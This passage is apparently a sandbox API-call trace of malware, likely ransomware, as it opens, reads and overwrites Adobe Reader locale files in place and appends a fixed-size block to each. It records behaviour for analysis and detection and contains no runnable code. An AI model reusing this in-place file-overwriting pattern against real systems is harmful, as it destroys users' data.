lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.614] CloseHandle (hObject=0x1fc) returned 1 [0081.615] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\DVA.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\dva.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.615] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.615] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4e00 [0081.616] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.616] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.616] ReleaseMutex (hMutex=0x168) returned 1 [0081.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.FRA", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0081.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.FRA", cchWideChar=7, lpMultiByteStr=0x1f7abdc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.FRA", lpUsedDefaultChar=0x0) returned 7 [0081.616] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.629] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3e00 [0081.629] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.643] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3e00 [0081.643] WriteFile (in: hFile=0x1fc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.644] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0081.644] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.644] CloseHandle (hObject=0x1fc) returned 1 [0081.645] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\RdLang32.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\rdlang32.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.645] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.645] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x15ee00 [0081.645] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.645] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.645] ReleaseMutex (hMutex=0x168) returned 1 [0081.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.FRA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.FRA", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.FRA", lpUsedDefaultChar=0x0) returned 12 [0081.646] ReadFile (in: hFile=0x1fc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0081.659] ReadFile (in: hFile=0x1fc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.665] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x15de00 [0081.665] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.673] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x15de00 [0081.674] WriteFile (in: hFile=0x1fc, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.674] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0081.675] WriteFile (in: hFile=0x1fc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0081.675] WriteFile (in: hFile=0x1fc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.676] CloseHandle (hObject=0x1fc) returned 1 [0081.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Spelling.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\spelling.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.677] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.677] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2a00 [0081.678] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.678] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.678] ReleaseMutex (hMutex=0x168) returned 1 [0081.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.FRA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.FRA", cchWideChar=12, lpMultiByteStr=0x1f735ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.FRA", lpUsedDefaultChar=0x0) returned 12 [0081.678] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.692] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1a00 [0081.692] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.701] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1a00 [0081.701] WriteFile (in: hFile=0x1fc, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.702] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0081.702] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.702] CloseHandle (hObject=0x1fc) returned 1 [0081.702] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Checkers.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\checkers.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.703] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.703] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1ea00 [0081.703] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.703] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.703] ReleaseMutex (hMutex=0x168) returned 1 [0081.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.HRV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.HRV", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.HRV", lpUsedDefaultChar=0x0) returned 12 [0081.703] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.713] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1da00 [0081.713] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.718] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1da00 [0081.718] WriteFile (in: hFile=0x1fc, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.718] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0081.718] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.719] CloseHandle (hObject=0x1fc) returned 1 [0081.719] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\PDDom.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\pddom.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0081.726] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.727] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2e00 [0081.727] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.727] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.727] ReleaseMutex (hMutex=0x168) returned 1 [0081.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.HRV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0081.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.HRV", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDDom.HRV", lpUsedDefaultChar=0x0) returned 9 [0081.727] ReadFile (in: hFile=0x1cc, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.731] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1e00 [0081.731] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.016] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1e00 [0082.016] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.017] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0082.017] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.018] CloseHandle (hObject=0x1cc) returned 1 [0082.018] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0082.019] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.019] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x9049 [0082.019] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.019] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.019] ReleaseMutex (hMutex=0x168) returned 1 [0082.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0082.019] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.021] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8049 [0082.021] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.022] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8049 [0082.022] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.023] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0082.023] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.023] CloseHandle (hObject=0x1cc) returned 1 [0082.023] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Annots.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\annots.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0082.024] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.024] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7d600 [0082.024] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.025] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.025] ReleaseMutex (hMutex=0x168) returned 1 [0082.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.HUN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.HUN", cchWideChar=10, lpMultiByteStr=0x1f733cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.HUN", lpUsedDefaultChar=0x0) returned 10 [0082.025] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0082.062] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7c600 [0082.062] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.101] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7c600 [0082.101] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.102] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0082.102] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0082.102] CloseHandle (hObject=0x1cc) returned 1 [0082.102] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\makeaccessible.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\makeaccessible.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0082.103] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.103] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x12c00 [0082.103] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.103] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.104] ReleaseMutex (hMutex=0x168) returned 1 [0082.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.HUN", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0082.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.HUN", cchWideChar=18, lpMultiByteStr=0x1f88a64, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.HUN", lpUsedDefaultChar=0x0) returned 18 [0082.104] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.112] SetFilePointer (in: hFile=0x1cc, 